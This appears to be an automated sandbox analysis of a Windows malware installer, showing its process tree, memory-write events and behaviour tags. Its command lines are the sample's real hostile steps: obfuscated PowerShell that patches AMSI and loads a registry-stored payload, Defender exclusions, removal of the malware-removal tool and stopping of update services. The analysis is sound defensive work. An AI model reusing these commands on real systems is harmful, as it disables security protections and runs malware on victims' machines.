PID 2968 wrote to memory of 824	2968	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp	86
PID 2968 wrote to memory of 4608	2968	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp	87
PID 2968 wrote to memory of 4608	2968	1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp	87
PID 824 wrote to memory of 4300	824	RuntimeBroker.exe	88
PID 824 wrote to memory of 4300	824	RuntimeBroker.exe	88
PID 824 wrote to memory of 1200	824	RuntimeBroker.exe	90
PID 824 wrote to memory of 1200	824	RuntimeBroker.exe	90
PID 824 wrote to memory of 4876	824	RuntimeBroker.exe	92
PID 824 wrote to memory of 4876	824	RuntimeBroker.exe	92
PID 824 wrote to memory of 3124	824	RuntimeBroker.exe	94
PID 824 wrote to memory of 3124	824	RuntimeBroker.exe	94
PID 5080 wrote to memory of 2356	5080	cmd.exe	108
PID 5080 wrote to memory of 2356	5080	cmd.exe	108
PID 1436 wrote to memory of 4768	1436	planet.exe	120
PID 1436 wrote to memory of 4768	1436	planet.exe	120
PID 1436 wrote to memory of 4768	1436	planet.exe	120
PID 1436 wrote to memory of 4768	1436	planet.exe	120
PID 1436 wrote to memory of 4768	1436	planet.exe	120
PID 1436 wrote to memory of 4768	1436	planet.exe	120
PID 4400 wrote to memory of 3088	4400	powershell.EXE	140
PID 4400 wrote to memory of 3088	4400	powershell.EXE	140
PID 4400 wrote to memory of 3088	4400	powershell.EXE	140
PID 4400 wrote to memory of 3088	4400	powershell.EXE	140
PID 4400 wrote to memory of 3088	4400	powershell.EXE	140
PID 4400 wrote to memory of 3088	4400	powershell.EXE	140
PID 4400 wrote to memory of 3088	4400	powershell.EXE	140
PID 4400 wrote to memory of 3088	4400	powershell.EXE	140
PID 3088 wrote to memory of 612	3088	dllhost.exe	5
PID 3088 wrote to memory of 668	3088	dllhost.exe	7
PID 3088 wrote to memory of 944	3088	dllhost.exe	12
PID 3088 wrote to memory of 388	3088	dllhost.exe	13
PID 3088 wrote to memory of 432	3088	dllhost.exe	14
PID 3088 wrote to memory of 1048	3088	dllhost.exe	16
PID 3088 wrote to memory of 1104	3088	dllhost.exe	17
PID 3088 wrote to memory of 1120	3088	dllhost.exe	18
PID 3088 wrote to memory of 1172	3088	dllhost.exe	19
PID 3088 wrote to memory of 1212	3088	dllhost.exe	20
PID 668 wrote to memory of 2812	668	lsass.exe	50
PID 668 wrote to memory of 2812	668	lsass.exe	50
PID 3088 wrote to memory of 1244	3088	dllhost.exe	21
PID 668 wrote to memory of 2812	668	lsass.exe	50
PID 668 wrote to memory of 2812	668	lsass.exe	50
PID 668 wrote to memory of 2812	668	lsass.exe	50
PID 3088 wrote to memory of 1284	3088	dllhost.exe	22
PID 668 wrote to memory of 2812	668	lsass.exe	50
PID 3088 wrote to memory of 1332	3088	dllhost.exe	23
PID 3088 wrote to memory of 1444	3088	dllhost.exe	24
PID 2176 wrote to memory of 4448	2176	cmd.exe	147
PID 2176 wrote to memory of 4448	2176	cmd.exe	147
PID 668 wrote to memory of 2812	668	lsass.exe	50
PID 3088 wrote to memory of 1452	3088	dllhost.exe	25
PID 3088 wrote to memory of 1520	3088	dllhost.exe	26

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:388
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b1699de8-4f32-45e3-ab0b-6ecf64630960}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3088
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e70ec9d7-1bc3-402d-9068-d27c734ea879}
  2⤵
  PID:4608

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:432

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1048

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1172
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2672
- C:\ProgramData\RuntimeBroker.exe
  C:\ProgramData\RuntimeBroker.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:vmhhznKoAZol{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wfMsHxVqsHEVvd,[Parameter(Position=1)][Type]$qJZldsBijb)$ZfhcDdYSXOT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+'c'+''+'t'+''+[Char](101)+''+'d'+'D'+'e'+'l'+[Char](101)+''+'g'+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nMe'+[Char](109)+'or'+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+'p'+''+'e'+'',''+'C'+''+'l'+''+'a'+''+[Char](115)+'s,'+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+',S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+''+[Char](105)+''+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+',A'+[Char](117)+'t'+[Char](111)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$ZfhcDdYSXOT.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+'l'+'Na'+'m'+''+'e'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+'e'+'B'+'y'+[Char](83)+''+'i'+'g'+','+''+'P'+''+'u'+'bl'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wfMsHxVqsHEVvd).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'ime'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');$ZfhcDdYSXOT.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'','Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+'B'+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$qJZldsBijb,$wfMsHxVqsHEVvd).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+'im'+[Char](101)+','+[Char](77)+'a'+'n'+''+[Char](97)+'g'+'e'+'d');Write-Output $ZfhcDdYSXOT.CreateType();}$itIsMBskoZDCm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'te'+'m'+''+'.'+''+'d'+''+[Char](108)+'l')}).GetType('Mic'+[Char](114)+''+[Char](111)+''+'s'+''+'o'+'f'+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+'v'+'e'+''+[Char](77)+'et'+'h'+'o'+[Char](100)+''+'s'+'');$gMVAJHaGhcLDYV=$itIsMBskoZDCm.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+'ocA'+'d'+'d'+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+'t'+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gXfdGUeBIgttgoBBFyf=vmhhznKoAZol @([String])([IntPtr]);$EgXOKGAQFPilCRucajRwKy=vmhhznKoAZol @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EKrPAwNaSdg=$itIsMBskoZDCm.GetMethod('Get'+'M'+''+'o'+''+'d'+''+[Char](117)+'l'+'e'+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$LHWtZBTvBGQNNJ=$gMVAJHaGhcLDYV.Invoke($Null,@([Object]$EKrPAwNaSdg,[Object]('L'+[Char](111)+'ad'+[Char](76)+''+'i'+'b'+'r'+'a'+[Char](114)+'y'+[Char](65)+'')));$IJPphyTBJZRtOjhgD=$gMVAJHaGhcLDYV.Invoke($Null,@([Object]$EKrPAwNaSdg,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+'a'+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$MpTdFHd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LHWtZBTvBGQNNJ,$gXfdGUeBIgttgoBBFyf).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+'d'+'l'+'l');$vzJLyaSibLMVgtDCb=$gMVAJHaGhcLDYV.Invoke($Null,@([Object]$MpTdFHd,[Object](''+[Char](65)+'m'+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+'u'+'f'+'f'+[Char](101)+''+[Char](114)+'')));$mJKrJVxRzd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IJPphyTBJZRtOjhgD,$EgXOKGAQFPilCRucajRwKy).Invoke($vzJLyaSibLMVgtDCb,[uint32]8,4,[ref]$mJKrJVxRzd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vzJLyaSibLMVgtDCb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IJPphyTBJZRtOjhgD,$EgXOKGAQFPilCRucajRwKy).Invoke($vzJLyaSibLMVgtDCb,[uint32]8,0x20,[ref]$mJKrJVxRzd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+'AR'+'E'+'').GetValue('di'+[Char](97)+''+[Char](108)+''+'e'+''+'r'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AThBtDbzQKGd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yPCdCIZhpXCDhk,[Parameter(Position=1)][Type]$RERmApxrOf)$pWlanYLjGoT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+'l'+'e'+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+''+'y'+'Mo'+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+','+'P'+'u'+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+'a'+'l'+''+[Char](101)+''+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+[Char](105)+''+'C'+'l'+'a'+'s'+[Char](115)+''+','+''+[Char](65)+''+'u'+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pWlanYLjGoT.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'am'+'e'+','+'H'+'i'+'d'+''+[Char](101)+''+'B'+'ySi'+'g'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$yPCdCIZhpXCDhk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'na'+'g'+'e'+'d'+'');$pWlanYLjGoT.DefineMethod('I'+[Char](110)+''+'v'+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+','+[Char](86)+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RERmApxrOf,$yPCdCIZhpXCDhk).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'age'+'d'+'');Write-Output $pWlanYLjGoT.CreateType();}$nZhFCeZehwfYr=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'ros'+[Char](111)+''+[Char](102)+''+'t'+'.'+'W'+''+'i'+''+'n'+''+'3'+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+'e'+'N'+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+''+[Char](115)+'');$rUsHuAwHJaFjDN=$nZhFCeZehwfYr.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+'c'+'A'+''+[Char](100)+'d'+'r'+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FWSpqzQgaoKVqeZmGmL=AThBtDbzQKGd @([String])([IntPtr]);$xkHAQVitcbMWYZsxHaSKLE=AThBtDbzQKGd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eyURWssqOxI=$nZhFCeZehwfYr.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+'32'+'.'+''+'d'+'ll')));$aLpPjBuWAjKyqw=$rUsHuAwHJaFjDN.Invoke($Null,@([Object]$eyURWssqOxI,[Object](''+'L'+''+[Char](111)+'a'+'d'+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$PhZIURpwWaWPSQTvz=$rUsHuAwHJaFjDN.Invoke($Null,@([Object]$eyURWssqOxI,[Object](''+[Char](86)+''+'i'+'r'+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'t'+'e'+''+'c'+''+[Char](116)+'')));$DNzsiyf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aLpPjBuWAjKyqw,$FWSpqzQgaoKVqeZmGmL).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$eFaUrXnsLVGkEBmcm=$rUsHuAwHJaFjDN.Invoke($Null,@([Object]$DNzsiyf,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$PVYLKEjlKr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PhZIURpwWaWPSQTvz,$xkHAQVitcbMWYZsxHaSKLE).Invoke($eFaUrXnsLVGkEBmcm,[uint32]8,4,[ref]$PVYLKEjlKr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$eFaUrXnsLVGkEBmcm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PhZIURpwWaWPSQTvz,$xkHAQVitcbMWYZsxHaSKLE).Invoke($eFaUrXnsLVGkEBmcm,[uint32]8,0x20,[ref]$PVYLKEjlKr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+'l'+[Char](101)+'rs'+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4988
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2568
- C:\ProgramData\RuntimeBroker.exe
  C:\ProgramData\RuntimeBroker.exe
  2⤵
  - Executes dropped EXE
  PID:1276
- C:\ProgramData\RuntimeBroker.exe
  C:\ProgramData\RuntimeBroker.exe
  2⤵
  - Executes dropped EXE
  PID:4416

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1332

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1444
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1520

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1668

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1688

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1796

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1924

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1980

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2016

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2064

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2208

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2776

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2848

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3268

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3388
- C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe
  "C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4964
- - C:\Users\Admin\AppData\Local\Temp\is-29HGF.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-29HGF.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp" /SL5="$502D4,5022309,876544,C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1116
  - - C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe
      "C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe" /VERYSILENT
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4600
    - - C:\Users\Admin\AppData\Local\Temp\is-AVIIP.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-AVIIP.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp" /SL5="$602D6,5022309,876544,C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:2968
      - C:\Windows\planet.exe
        
        "C:\Windows\planet.exe" /verysilent
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1436
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2000
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:5080
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:2356
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:4328
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:832
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:4452
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:1680
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:3224
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4380
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4460
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4368
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:3572
        
        C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        7⤵
        
        PID:4768
        
        C:\Windows\system32\sc.exe
        
